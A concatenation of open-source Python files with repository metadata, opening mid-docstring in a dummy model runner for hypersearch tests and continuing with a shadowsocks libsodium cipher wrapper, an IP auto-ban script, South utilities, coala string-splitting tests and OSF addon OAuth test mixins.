randomizeWait: OPTIONAL-([0.0-1.0] ). Default:None
If set to a value, the above specified
wait time will be randomly be dithered by
+/- <randomizeWait>% of the specfied value.
For example, if randomizeWait=0.2, the wait
time will be dithered by +/- 20% of its value.
iterations: OPTIONAL-How many iterations to run the model
for. -1 means run forever (default=1)
metricFunctions: OPTIONAL-A list of single argument functions
serialized as strings, which return the metric
value given the record number.
Mutually exclusive with metricValue
metricValue: OPTIONAL-A single value to use for the metric
value (used to debug hypersearch).
Mutually exclusive with metricFunctions
finalize: OPTIONAL-(True/False). Default:True
When False, this will prevent the model from
recording it's metrics and performing other
functions that it usually performs after the
model has finished running
permutationParams: A dict containing the instances of all the
variables being permuted over
experimentDirectory: REQUIRED-An absolute path to a directory
with a valid description.py file.
NOTE: This does not actually affect the
running of the model or the metrics
produced. It is required to create certain
objects (such as the output stream)
makeCheckpoint: True to actually write a checkpoint out to
disk (default: False)
sysExitModelRange: A string containing two integers 'firstIdx,
endIdx'. When present, if we are running the
firstIdx'th model up to but not including the
endIdx'th model, then do a sys.exit() while
running the model. This causes the worker to
exit, simulating an orphaned model.
delayModelRange: A string containing two integers 'firstIdx,
endIdx'. When present, if we are running the
firstIdx'th model up to but not including the
endIdx'th model, then do a delay of 10 sec.
while running the model. This causes the
worker to run slower and for some other worker
to think the model should be orphaned.
exitAfter: The number of iterations after which the model
should perform a sys exit. This is an
alternative way of creating an orphaned model
that use's the dummmy model's modelIndex
instead of the modelID
errModelRange: A string containing two integers 'firstIdx,
endIdx'. When present, if we are running the
firstIdx'th model up to but not including the
endIdx'th model, then raise an exception while
running the model. This causes the model to
fail with a CMPL_REASON_ERROR reason
sleepModelRange: A string containing 3 integers 'firstIdx,
endIdx: delay'. When present, if we are running
the firstIdx'th model up to but not including
the endIdx'th model, then sleep for delay
seconds at the beginning of the run.
jobFailErr: If true, model will raise a JobFailException
which should cause the job to be marked as
failed and immediately cancel all other workers.
predictedField: Name of the input field for which this model is being
optimized
reportKeyPatterns: list of items from the results dict to include in
the report. These can be regular expressions.
optimizeKeyPattern: Which report item, if any, we will be optimizing for.
This can also be a regular expression, but is an error
if it matches more than one key from the experiment's
results.
jobsDAO: Jobs data access object - the interface to the
jobs database which has the model's table.
modelCheckpointGUID:
A persistent, globally-unique identifier for
constructing the model checkpoint key
logLevel: override logging level to this value, if not None
predictionCacheMaxRecords:
Maximum number of records for the prediction output cache.
Pass None for the default value.
"""
super(OPFDummyModelRunner, self).__init__(modelID=modelID,
jobID=jobID,
predictedField=predictedField,
experimentDir=None,
reportKeyPatterns=reportKeyPatterns,
optimizeKeyPattern=optimizeKeyPattern,
jobsDAO=jobsDAO,
modelCheckpointGUID=modelCheckpointGUID,
logLevel=logLevel,
predictionCacheMaxRecords=None)
self._predictionCacheMaxRecords = predictionCacheMaxRecords
self._streamDef = copy.deepcopy(self._DUMMY_STREAMDEF)
self._params = copy.deepcopy(self._DEFAULT_PARAMS)
# -----------------------------------------------------------------------
# Read the index of the current model in the test
if 'permutationParams' in params \
and '__model_num' in params['permutationParams']:
self.modelIndex=params['permutationParams']['__model_num']
else:
self.modelIndex = OPFDummyModelRunner.modelIndex
OPFDummyModelRunner.modelIndex += 1
# -----------------------------------------------------------------------
self._loadDummyModelParameters(params)
# =========================================================================
# Load parameters into instance variables
# =========================================================================
self._logger.debug("Using Dummy model params: %s", self._params)
self._busyWaitTime = self._params['waitTime']
self._iterations = self._params['iterations']
self._doFinalize = self._params['finalize']
self._delay = self._params['delay']
self._sleepModelRange = self._params['sleepModelRange']
self._makeCheckpoint = self._params['makeCheckpoint']
self._finalDelay = self._params['finalDelay']
self._exitAfter = self._params['exitAfter']
# =========================================================================
# Randomize Wait time, if necessary
# =========================================================================
self.randomizeWait = self._params['randomizeWait']
if self._busyWaitTime is not None:
self.__computeWaitTime()
# =========================================================================
# Load the appropriate metric value or metric function
# =========================================================================
if self._params['metricFunctions'] is not None \
and self._params['metricValue'] is not None:
raise RuntimeError("Error, only 1 of 'metricFunctions' or 'metricValue'"\
" can be passed to OPFDummyModelRunner params ")
self.metrics = None
self.metricValue = None
if self._params['metricFunctions'] is not None:
self.metrics = eval(self._params['metricFunctions'])
elif self._params['metricValue'] is not None:
self.metricValue = float(self._params['metricValue'])
else:
self.metrics = OPFDummyModelRunner.metrics[0]
# =========================================================================
# Create an OpfExperiment instance, if a directory is specified
# =========================================================================
if self._params['experimentDirectory'] is not None:
self._model = self.__createModel(self._params['experimentDirectory'])
self.__fieldInfo = self._model.getFieldInfo()
# =========================================================================
# Get the sysExit model range
# =========================================================================
self._sysExitModelRange = self._params['sysExitModelRange']
if self._sysExitModelRange is not None:
self._sysExitModelRange = [int(x) for x in self._sysExitModelRange.split(',')]
# =========================================================================
# Get the delay model range
# =========================================================================
self._delayModelRange = self._params['delayModelRange']
if self._delayModelRange is not None:
self._delayModelRange = [int(x) for x in self._delayModelRange.split(',')]
# =========================================================================
# Get the errModel range
# =========================================================================
self._errModelRange = self._params['errModelRange']
if self._errModelRange is not None:
self._errModelRange = [int(x) for x in self._errModelRange.split(',')]
self._computModelDelay()
# Get the jobFailErr boolean
self._jobFailErr = self._params['jobFailErr']
self._logger.debug("Dummy Model %d params %r", self._modelID, self._params)
def _loadDummyModelParameters(self, params):
""" Loads all the parameters for this dummy model. For any paramters
specified as lists, read the appropriate value for this model using the model
index """
for key, value in params.iteritems():
if type(value) == list:
index = self.modelIndex % len(params[key])
self._params[key] = params[key][index]
else:
self._params[key] = params[key]
def _computModelDelay(self):
""" Computes the amount of time (if any) to delay the run of this model.
This can be determined by two mutually exclusive parameters:
delay and sleepModelRange.
'delay' specifies the number of seconds a model should be delayed. If a list
is specified, the appropriate amount of delay is determined by using the
model's modelIndex property.
However, this doesn't work when testing orphaned models, because the
modelIndex will be the same for every recovery attempt. Therefore, every
recovery attempt will also be delayed and potentially orphaned.
'sleepModelRange' doesn't use the modelIndex property for a model, but rather
sees which order the model is in the database, and uses that to determine
whether or not a model should be delayed.
"""
# 'delay' and 'sleepModelRange' are mutually exclusive
if self._params['delay'] is not None \
and self._params['sleepModelRange'] is not None:
raise RuntimeError("Only one of 'delay' or "
"'sleepModelRange' may be specified")
# Get the sleepModel range
if self._sleepModelRange is not None:
range, delay = self._sleepModelRange.split(':')
delay = float(delay)
range = map(int, range.split(','))
modelIDs = self._jobsDAO.jobGetModelIDs(self._jobID)
modelIDs.sort()
range[1] = min(range[1], len(modelIDs))
# If the model is in range, add the delay
if self._modelID in modelIDs[range[0]:range[1]]:
self._delay = delay
else:
self._delay = self._params['delay']
def _getMetrics(self):
""" Protected function that can be overridden by subclasses. Its main purpose
is to allow the the OPFDummyModelRunner to override this with deterministic
values
Returns: All the metrics being computed for this model
"""
metric = None
if self.metrics is not None:
metric = self.metrics(self._currentRecordIndex+1)
elif self.metricValue is not None:
metric = self.metricValue
else:
raise RuntimeError('No metrics or metric value specified for dummy model')
return {self._optimizeKeyPattern:metric}
def run(self):
""" Runs the given OPF task against the given Model instance """
self._logger.debug("Starting Dummy Model: modelID=%s;" % (self._modelID))
# =========================================================================
# Initialize periodic activities (e.g., for model result updates)
# =========================================================================
periodic = self._initPeriodicActivities()
self._optimizedMetricLabel = self._optimizeKeyPattern
self._reportMetricLabels = [self._optimizeKeyPattern]
# =========================================================================
# Create our top-level loop-control iterator
# =========================================================================
if self._iterations >= 0:
iterTracker = iter(xrange(self._iterations))
else:
iterTracker = iter(itertools.count())
# =========================================================================
# This gets set in the unit tests. It tells the worker to sys exit
# the first N models. This is how we generate orphaned models
doSysExit = False
if self._sysExitModelRange is not None:
modelAndCounters = self._jobsDAO.modelsGetUpdateCounters(self._jobID)
modelIDs = [x[0] for x in modelAndCounters]
modelIDs.sort()
(beg,end) = self._sysExitModelRange
if self._modelID in modelIDs[int(beg):int(end)]:
doSysExit = True
if self._delayModelRange is not None:
modelAndCounters = self._jobsDAO.modelsGetUpdateCounters(self._jobID)
modelIDs = [x[0] for x in modelAndCounters]
modelIDs.sort()
(beg,end) = self._delayModelRange
if self._modelID in modelIDs[int(beg):int(end)]:
time.sleep(10)
# DEBUG!!!! infinite wait if we have 50 models
#if len(modelIDs) >= 50:
# jobCancel = self._jobsDAO.jobGetFields(self._jobID, ['cancel'])[0]
# while not jobCancel:
# time.sleep(1)
# jobCancel = self._jobsDAO.jobGetFields(self._jobID, ['cancel'])[0]
if self._errModelRange is not None:
modelAndCounters = self._jobsDAO.modelsGetUpdateCounters(self._jobID)
modelIDs = [x[0] for x in modelAndCounters]
modelIDs.sort()
(beg,end) = self._errModelRange
if self._modelID in modelIDs[int(beg):int(end)]:
raise RuntimeError("Exiting with error due to errModelRange parameter")
# =========================================================================
# Delay, if necessary
if self._delay is not None:
time.sleep(self._delay)
# =========================================================================
# Run it!
# =========================================================================
self._currentRecordIndex = 0
while True:
# =========================================================================
# Check if the model should be stopped
# =========================================================================
# If killed by a terminator, stop running
if self._isKilled:
break
# If job stops or hypersearch ends, stop running
if self._isCanceled:
break
# If model is mature, stop running ONLY IF we are not the best model
# for the job. Otherwise, keep running so we can keep returning
# predictions to the user
if self._isMature:
if not self._isBestModel:
self._cmpReason = self._jobsDAO.CMPL_REASON_STOPPED
break
else:
self._cmpReason = self._jobsDAO.CMPL_REASON_EOF
# =========================================================================
# Get the the next record, and "write it"
# =========================================================================
try:
self._currentRecordIndex = next(iterTracker)
except StopIteration:
break
# "Write" a dummy output value. This is used to test that the batched
# writing works properly
self._writePrediction(ModelResult(None, None, None, None))
periodic.tick()
# =========================================================================
# Compute wait times. See if model should exit
# =========================================================================
if self.__shouldSysExit(self._currentRecordIndex):
sys.exit(1)
# Simulate computation time
if self._busyWaitTime is not None:
time.sleep(self._busyWaitTime)
self.__computeWaitTime()
# Asked to abort after so many iterations?
if doSysExit:
sys.exit(1)
# Asked to raise a jobFailException?
if self._jobFailErr:
raise utils.JobFailException("E10000",
"dummyModel's jobFailErr was True.")
# =========================================================================
# Handle final operations
# =========================================================================
if self._doFinalize:
if not self._makeCheckpoint:
self._model = None
# Delay finalization operation
if self._finalDelay is not None:
time.sleep(self._finalDelay)
self._finalize()
self._logger.info("Finished: modelID=%r "% (self._modelID))
return (self._cmpReason, None)
def __computeWaitTime(self):
if self.randomizeWait is not None:
self._busyWaitTime = random.uniform((1.0-self.randomizeWait) * self._busyWaitTime,
(1.0+self.randomizeWait) * self._busyWaitTime)
def __createModel(self, expDir):
# -----------------------------------------------------------------------
# Load the experiment's description.py module
descriptionPyModule = opfhelpers.loadExperimentDescriptionScriptFromDir(
expDir)
expIface = opfhelpers.getExperimentDescriptionInterfaceFromModule(
descriptionPyModule)
# -----------------------------------------------------------------------
# Construct the model instance
modelDescription = expIface.getModelDescription()
return ModelFactory.create(modelDescription)
def _createPredictionLogger(self):
"""
Creates the model's PredictionLogger object, which is an interface to write
model results to a permanent storage location
"""
class DummyLogger:
def writeRecord(self, record): pass
def writeRecords(self, records, progressCB): pass
def close(self): pass
self._predictionLogger = DummyLogger()
def __shouldSysExit(self, iteration):
"""
Checks to see if the model should exit based on the exitAfter dummy
parameter
"""
if self._exitAfter is None \
or iteration < self._exitAfter:
return False
results = self._jobsDAO.modelsGetFieldsForJob(self._jobID, ['params'])
modelIDs = [e[0] for e in results]
modelNums = [json.loads(e[1][0])['structuredParams']['__model_num'] for e in results]
sameModelNumbers = filter(lambda x: x[1] == self.modelIndex,
zip(modelIDs, modelNums))
firstModelID = min(zip(*sameModelNumbers)[0])
return firstModelID == self._modelID
| agpl-3.0 |
dzhuang/shadowsocks-1 | shadowsocks/crypto/sodium.py | 1032 | 3778 | #!/usr/bin/env python
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
from ctypes import c_char_p, c_int, c_ulonglong, byref, \
create_string_buffer, c_void_p
from shadowsocks.crypto import util
__all__ = ['ciphers']
libsodium = None
loaded = False
buf_size = 2048
# for salsa20 and chacha20
BLOCK_SIZE = 64
def load_libsodium():
global loaded, libsodium, buf
libsodium = util.find_library('sodium', 'crypto_stream_salsa20_xor_ic',
'libsodium')
if libsodium is None:
raise Exception('libsodium not found')
libsodium.crypto_stream_salsa20_xor_ic.restype = c_int
libsodium.crypto_stream_salsa20_xor_ic.argtypes = (c_void_p, c_char_p,
c_ulonglong,
c_char_p, c_ulonglong,
c_char_p)
libsodium.crypto_stream_chacha20_xor_ic.restype = c_int
libsodium.crypto_stream_chacha20_xor_ic.argtypes = (c_void_p, c_char_p,
c_ulonglong,
c_char_p, c_ulonglong,
c_char_p)
buf = create_string_buffer(buf_size)
loaded = True
class SodiumCrypto(object):
def __init__(self, cipher_name, key, iv, op):
if not loaded:
load_libsodium()
self.key = key
self.iv = iv
self.key_ptr = c_char_p(key)
self.iv_ptr = c_char_p(iv)
if cipher_name == 'salsa20':
self.cipher = libsodium.crypto_stream_salsa20_xor_ic
elif cipher_name == 'chacha20':
self.cipher = libsodium.crypto_stream_chacha20_xor_ic
else:
raise Exception('Unknown cipher')
# byte counter, not block counter
self.counter = 0
def update(self, data):
global buf_size, buf
l = len(data)
# we can only prepend some padding to make the encryption align to
# blocks
padding = self.counter % BLOCK_SIZE
if buf_size < padding + l:
buf_size = (padding + l) * 2
buf = create_string_buffer(buf_size)
if padding:
data = (b'\0' * padding) + data
self.cipher(byref(buf), c_char_p(data), padding + l,
self.iv_ptr, int(self.counter / BLOCK_SIZE), self.key_ptr)
self.counter += l
# buf is copied to a str object when we access buf.raw
# strip off the padding
return buf.raw[padding:padding + l]
ciphers = {
'salsa20': (32, 8, SodiumCrypto),
'chacha20': (32, 8, SodiumCrypto),
}
def test_salsa20():
cipher = SodiumCrypto('salsa20', b'k' * 32, b'i' * 16, 1)
decipher = SodiumCrypto('salsa20', b'k' * 32, b'i' * 16, 0)
util.run_cipher(cipher, decipher)
def test_chacha20():
cipher = SodiumCrypto('chacha20', b'k' * 32, b'i' * 16, 1)
decipher = SodiumCrypto('chacha20', b'k' * 32, b'i' * 16, 0)
util.run_cipher(cipher, decipher)
if __name__ == '__main__':
test_chacha20()
test_salsa20()
| apache-2.0 |
nirmeshk/oh-mainline | vendor/packages/south/south/utils/__init__.py | 119 | 1945 | """
Generally helpful utility functions.
"""
def _ask_for_it_by_name(name):
"Returns an object referenced by absolute path."
bits = str(name).split(".")
## what if there is no absolute reference?
if len(bits) > 1:
modulename = ".".join(bits[:-1])
else:
modulename = bits[0]
module = __import__(modulename, {}, {}, bits[-1])
if len(bits) == 1:
return module
else:
return getattr(module, bits[-1])
def ask_for_it_by_name(name):
"Returns an object referenced by absolute path. (Memoised outer wrapper)"
if name not in ask_for_it_by_name.cache:
ask_for_it_by_name.cache[name] = _ask_for_it_by_name(name)
return ask_for_it_by_name.cache[name]
ask_for_it_by_name.cache = {}
def get_attribute(item, attribute):
"""
Like getattr, but recursive (i.e. you can ask for 'foo.bar.yay'.)
"""
value = item
for part in attribute.split("."):
value = getattr(value, part)
return value
def auto_through(field):
"Returns if the M2M class passed in has an autogenerated through table or not."
return (
# Django 1.0/1.1
(not field.rel.through)
or
# Django 1.2+
getattr(getattr(field.rel.through, "_meta", None), "auto_created", False)
)
def auto_model(model):
"Returns if the given model was automatically generated."
return getattr(model._meta, "auto_created", False)
def memoize(function):
"Standard memoization decorator."
name = function.__name__
_name = '_' + name
def method(self):
if not hasattr(self, _name):
value = function(self)
setattr(self, _name, value)
return getattr(self, _name)
def invalidate():
if hasattr(method, _name):
delattr(method, _name)
method.__name__ = function.__name__
method.__doc__ = function.__doc__
method._invalidate = invalidate
return method
| agpl-3.0 |
smpetrey/shadowsocks | utils/autoban.py | 1033 | 2156 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2015 clowwindy
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='See README')
parser.add_argument('-c', '--count', default=3, type=int,
help='with how many failure times it should be '
'considered as an attack')
config = parser.parse_args()
ips = {}
banned = set()
for line in sys.stdin:
if 'can not parse header when' in line:
ip = line.split()[-1].split(':')[0]
if ip not in ips:
ips[ip] = 1
print(ip)
sys.stdout.flush()
else:
ips[ip] += 1
if ip not in banned and ips[ip] >= config.count:
banned.add(ip)
cmd = 'iptables -A INPUT -s %s -j DROP' % ip
print(cmd, file=sys.stderr)
sys.stderr.flush()
os.system(cmd)
| apache-2.0 |
sudheesh001/coala | coalib/tests/parsing/StringProcessing/UnescapedSplitTest.py | 4 | 5425 |
from coalib.parsing.StringProcessing import unescaped_split
from coalib.tests.parsing.StringProcessing.StringProcessingTestBase import (
StringProcessingTestBase)
class UnescapedSplitTest(StringProcessingTestBase):
bs = StringProcessingTestBase.bs
test_basic_pattern = r"'"
test_basic_expected_results = [
[r"out1 ", r"escaped-escape: \\ ", r" out2"],
[r"out1 ", r"escaped-quote: \' ", r" out2"],
[r"out1 ", r"escaped-anything: \X ", r" out2"],
[r"out1 ", r"two escaped escapes: \\\\ ", r" out2"],
[r"out1 ", r"escaped-quote at end: \'", r" out2"],
[r"out1 ", r"escaped-escape at end: " + 2 * bs, r" out2"],
[r"out1 ", r"str1", r" out2 ", r"str2", r" out2"],
[r"out1 \' ", r"str1", r" out2 ", r"str2", r" out2"],
[r"out1 \\\' ", r"str1", r" out2 ", r"str2", r" out2"],
[r"out1 \\ ", r"str1", r" out2 ", r"str2", r" out2"],
[r"out1 \\\\ ", r"str1", r" out2 ", r"str2", r" out2"],
[r"out1 " + 2 * bs, r"str1", r" out2 ", r"str2", r" out2"],
[r"out1 " + 4 * bs, r"str1", r" out2 ", r"str2", r" out2"],
[r"out1 ", r"str1", r"", r"str2", r"", r"str3", r" out2"],
[r""],
[r"out1 out2 out3"],
[bs],
[2 * bs]]
# Test the basic unescaped_split() functionality.
def test_basic(self):
split_pattern = self.test_basic_pattern
expected_results = self.test_basic_expected_results
self.assertResultsEqual(
unescaped_split,
{(split_pattern, test_string, 0, False, use_regex): result
for test_string, result in zip(self.test_strings,
expected_results)
for use_regex in [True, False]},
list)
# Test the unescaped_split() function while varying the max_split
# parameter.
def test_max_split(self):
split_pattern = self.test_basic_pattern
expected_master_results = self.test_basic_expected_results
for max_split in [1, 2, 3, 4, 5, 6, 7, 8, 9, 112]:
expected_results = [
elem[0: max_split] for elem in expected_master_results]
for res, master in zip(expected_results, expected_master_results):
if max_split < len(master):
# max_split is less the length of our master result list,
# need to append the rest as a joined string.
res.append(str.join(split_pattern, master[max_split:]))
self.assertResultsEqual(
unescaped_split,
{(split_pattern,
test_string,
max_split,
False,
use_regex): result
for test_string, result in zip(self.test_strings,
expected_results)
for use_regex in [True, False]},
list)
# Test the unescaped_split() function with different regex patterns.
def test_regex_pattern(self):
expected_results = [
[r"", r"", r"cba###\\13q4ujsabbc\+'**'ac###.#.####-ba"],
[r"", r"c", r"ccba###\\13q4ujs", r"bc\+'**'ac###.#.####-ba"],
[r"", r"c", r"ccba###\\13q4ujs", r"bc\+'**'", r"###.#.####-ba"],
[r"abcabccba###", r"\13q4ujsabbc", r"+'**'ac###.#.####-ba"],
[r"abcabccba", r"\\13q4ujsabbc\+'**'ac", r".", r".", r"-ba"],
[r"", r"", r"c", r"", r"cc", r"", r"", r"", r"\13q4ujs", r"", r"",
r"c\+'**'", r"c", r"", r"", r"", r"", r"-", r"", r""],
[r"", r"cba###\\13q4ujs", r"\+'**'", r"###.#.####-ba"],
[r"abcabccba###" + 2 * self.bs,
r"3q4ujsabbc\+'**'ac###.#.####-ba"]]
self.assertResultsEqual(
unescaped_split,
{(pattern, self.multi_pattern_test_string, 0, False, True): result
for pattern, result in zip(self.multi_patterns,
expected_results)},
list)
# Test the unescaped_split() function for its remove_empty_matches feature.
def test_auto_trim(self):
expected_results = [
[],
[2 * self.bs, r"\\\\\;\\#", r"\\\'", r"\;\\\\", r"+ios"],
[r"1", r"2", r"3", r"4", r"5", r"6"],
[r"1", r"2", r"3", r"4", r"5", r"6", r"7"],
[],
[r"Hello world"],
[r"\;"],
[2 * self.bs],
[r"abc", r"a", r"asc"]]
self.assertResultsEqual(
unescaped_split,
{(self.auto_trim_test_pattern,
test_string,
0,
True,
use_regex): result
for test_string, result in zip(self.auto_trim_test_strings,
expected_results)
for use_regex in [True, False]},
list)
# Test the unescaped_split() function with regexes disabled.
def test_disabled_regex(self):
expected_results = [[x] for x in self.test_strings]
self.assertResultsEqual(
unescaped_split,
{(r"'()", test_string, 0, False, False): result
for test_string, result in zip(self.test_strings,
expected_results)},
list)
| agpl-3.0 |
Nesiehr/osf.io | addons/base/testing/models.py | 7 | 22179 | # -*- coding: utf-8 -*-
import abc
import mock
from django.utils import timezone
from framework.auth import Auth
from framework.exceptions import HTTPError
from nose.tools import * # noqa (PEP8 asserts)
from tests.factories import ProjectFactory, UserFactory
from tests.utils import mock_auth
from addons.base import exceptions
from addons.base.testing.utils import MockFolder
class OAuthAddonModelTestSuiteMixinBase(object):
___metaclass__ = abc.ABCMeta
@abc.abstractproperty
def short_name(self):
pass
@abc.abstractproperty
def full_name(self):
pass
@abc.abstractproperty
def ExternalAccountFactory(self):
pass
class OAuthAddonUserSettingTestSuiteMixin(OAuthAddonModelTestSuiteMixinBase):
def setUp(self):
super(OAuthAddonUserSettingTestSuiteMixin, self).setUp()
self.node = ProjectFactory()
self.user = self.node.creator
self.external_account = self.ExternalAccountFactory()
self.user.external_accounts.append(self.external_account)
self.user.save()
self.user_settings = self.user.get_or_add_addon(self.short_name)
def test_grant_oauth_access_no_metadata(self):
self.user_settings.grant_oauth_access(
node=self.node,
external_account=self.external_account,
)
self.user_settings.save()
assert_equal(
self.user_settings.oauth_grants,
{self.node._id: {self.external_account._id: {}}},
)
def test_grant_oauth_access_metadata(self):
self.user_settings.grant_oauth_access(
node=self.node,
external_account=self.external_account,
metadata={'folder': 'fake_folder_id'}
)
self.user_settings.save()
assert_equal(
self.user_settings.oauth_grants,
{
self.node._id: {
self.external_account._id: {'folder': 'fake_folder_id'}
},
}
)
def test_verify_oauth_access_no_metadata(self):
self.user_settings.grant_oauth_access(
node=self.node,
external_account=self.external_account,
)
self.user_settings.save()
assert_true(
self.user_settings.verify_oauth_access(
node=self.node,
external_account=self.external_account
)
)
assert_false(
self.user_settings.verify_oauth_access(
node=self.node,
external_account=self.ExternalAccountFactory()
)
)
def test_verify_oauth_access_metadata(self):
self.user_settings.grant_oauth_access(
node=self.node,
external_account=self.external_account,
metadata={'folder': 'fake_folder_id'}
)
self.user_settings.save()
assert_true(
self.user_settings.verify_oauth_access(
node=self.node,
external_account=self.external_account,
metadata={'folder': 'fake_folder_id'}
)
)
assert_false(
self.user_settings.verify_oauth_access(
node=self.node,
external_account=self.external_account,
metadata={'folder': 'another_folder_id'}
)
)
class OAuthAddonNodeSettingsTestSuiteMixin(OAuthAddonModelTestSuiteMixinBase):
@abc.abstractproperty
def NodeSettingsFactory(self):
pass
@abc.abstractproperty
def NodeSettingsClass(self):
pass
@abc.abstractproperty
def UserSettingsFactory(self):
pass
def _node_settings_class_kwargs(self, node, user_settings):
return {
'user_settings': self.user_settings,
'folder_id': '1234567890',
'owner': self.node
}
def setUp(self):
super(OAuthAddonNodeSettingsTestSuiteMixin, self).setUp()
self.node = ProjectFactory()
self.user = self.node.creator
self.external_account = self.ExternalAccountFactory()
self.user.add_addon(self.short_name)
self.user.external_accounts.append(self.external_account)
self.user.save()
self.user_settings = self.user.get_addon(self.short_name)
self.user_settings.grant_oauth_access(
node=self.node,
external_account=self.external_account,
metadata={'folder': '1234567890'}
)
self.user_settings.save()
self.node_settings = self.NodeSettingsFactory(
**self._node_settings_class_kwargs(self.node, self.user_settings)
)
self.node_settings.external_account = self.external_account
self.node_settings.save()
def tearDown(self):
super(OAuthAddonNodeSettingsTestSuiteMixin, self).tearDown()
self.user_settings.remove()
self.node_settings.remove()
self.external_account.remove()
self.node.remove()
self.user.remove()
def test_configured_true(self):
assert_true(self.node_settings.has_auth)
assert_true(self.node_settings.complete)
assert_true(self.node_settings.configured)
def test_configured_false(self):
self.node_settings.clear_settings()
self.node_settings.save()
assert_false(self.node_settings.configured)
def test_complete_true(self):
assert_true(self.node_settings.has_auth)
assert_true(self.node_settings.complete)
def test_complete_has_auth_not_verified(self):
with mock_auth(self.user):
self.user_settings.revoke_oauth_access(self.external_account)
self.node_settings.reload()
assert_false(self.node_settings.has_auth)
assert_false(self.node_settings.complete)
def test_complete_auth_false(self):
self.node_settings.user_settings = None
assert_false(self.node_settings.has_auth)
assert_false(self.node_settings.complete)
def test_fields(self):
node_settings = self.NodeSettingsClass(user_settings=self.user_settings)
node_settings.save()
assert_true(node_settings.user_settings)
assert_equal(node_settings.user_settings.owner, self.user)
assert_true(hasattr(node_settings, 'folder_id'))
assert_true(hasattr(node_settings, 'user_settings'))
def test_folder_defaults_to_none(self):
node_settings = self.NodeSettingsClass(user_settings=self.user_settings)
node_settings.save()
assert_is_none(node_settings.folder_id)
def test_has_auth(self):
self.user.external_accounts = []
self.user_settings.reload()
node = ProjectFactory()
settings = self.NodeSettingsClass(user_settings=self.user_settings, owner=node)
settings.save()
assert_false(settings.has_auth)
self.user.external_accounts.append(self.external_account)
settings.set_auth(self.external_account, self.user)
settings.reload()
assert_true(settings.has_auth)
def test_clear_auth(self):
node_settings = self.NodeSettingsFactory()
node_settings.external_account = self.ExternalAccountFactory()
node_settings.user_settings = self.UserSettingsFactory()
node_settings.save()
node_settings.clear_auth()
assert_is_none(node_settings.external_account)
assert_is_none(node_settings.user_settings)
def test_clear_settings(self):
node_settings = self.NodeSettingsFactory()
node_settings.external_account = self.ExternalAccountFactory()
node_settings.user_settings = self.UserSettingsFactory()
node_settings.save()
node_settings.clear_settings()
assert_is_none(node_settings.folder_id)
def test_to_json(self):
settings = self.node_settings
user = UserFactory()
result = settings.to_json(user)
assert_equal(result['addon_short_name'], self.short_name)
def test_delete(self):
assert_true(self.node_settings.user_settings)
assert_true(self.node_settings.folder_id)
old_logs = self.node.logs
self.node_settings.delete()
self.node_settings.save()
assert_is(self.node_settings.user_settings, None)
assert_is(self.node_settings.folder_id, None)
assert_true(self.node_settings.deleted)
assert_equal(list(self.node.logs), list(old_logs))
def test_deauthorize(self):
assert_true(self.node_settings.user_settings)
assert_true(self.node_settings.folder_id)
self.node_settings.deauthorize(auth=Auth(self.user))
self.node_settings.save()
assert_is(self.node_settings.user_settings, None)
assert_is(self.node_settings.folder_id, None)
last_log = self.node.logs.latest()
assert_equal(last_log.action, '{0}_node_deauthorized'.format(self.short_name))
params = last_log.params
assert_in('node', params)
assert_in('project', params)
def test_set_folder(self):
folder_id = '1234567890'
self.node_settings.set_folder(folder_id, auth=Auth(self.user))
self.node_settings.save()
# Folder was set
assert_equal(self.node_settings.folder_id, folder_id)
# Log was saved
last_log = self.node.logs.latest()
assert_equal(last_log.action, '{0}_folder_selected'.format(self.short_name))
def test_set_user_auth(self):
node_settings = self.NodeSettingsFactory()
user_settings = self.UserSettingsFactory()
external_account = self.ExternalAccountFactory()
user_settings.owner.external_accounts.append(external_account)
user_settings.save()
node_settings.external_account = external_account
node_settings.set_auth(external_account, user_settings.owner)
node_settings.save()
assert_true(node_settings.has_auth)
assert_equal(node_settings.user_settings._id, user_settings._id)
# A log was saved
last_log = node_settings.owner.logs.latest()
assert_equal(last_log.action, '{0}_node_authorized'.format(self.short_name))
log_params = last_log.params
assert_equal(log_params['node'], node_settings.owner._primary_key)
assert_equal(last_log.user, user_settings.owner)
def test_serialize_credentials(self):
self.user_settings.external_accounts[0].oauth_key = 'key-11'
self.user_settings.save()
credentials = self.node_settings.serialize_waterbutler_credentials()
expected = {'token': self.node_settings.external_account.oauth_key}
assert_equal(credentials, expected)
def test_serialize_credentials_not_authorized(self):
self.node_settings.user_settings = None
self.node_settings.save()
with assert_raises(exceptions.AddonError):
self.node_settings.serialize_waterbutler_credentials()
def test_serialize_settings(self):
settings = self.node_settings.serialize_waterbutler_settings()
expected = {'folder': self.node_settings.folder_id}
assert_equal(settings, expected)
def test_serialize_settings_not_configured(self):
self.node_settings.clear_settings()
self.node_settings.save()
with assert_raises(exceptions.AddonError):
self.node_settings.serialize_waterbutler_settings()
def test_create_log(self):
action = 'file_added'
path = 'pizza.nii'
nlog = len(self.node.logs)
self.node_settings.create_waterbutler_log(
auth=Auth(user=self.user),
action=action,
metadata={'path': path, 'materialized': path},
)
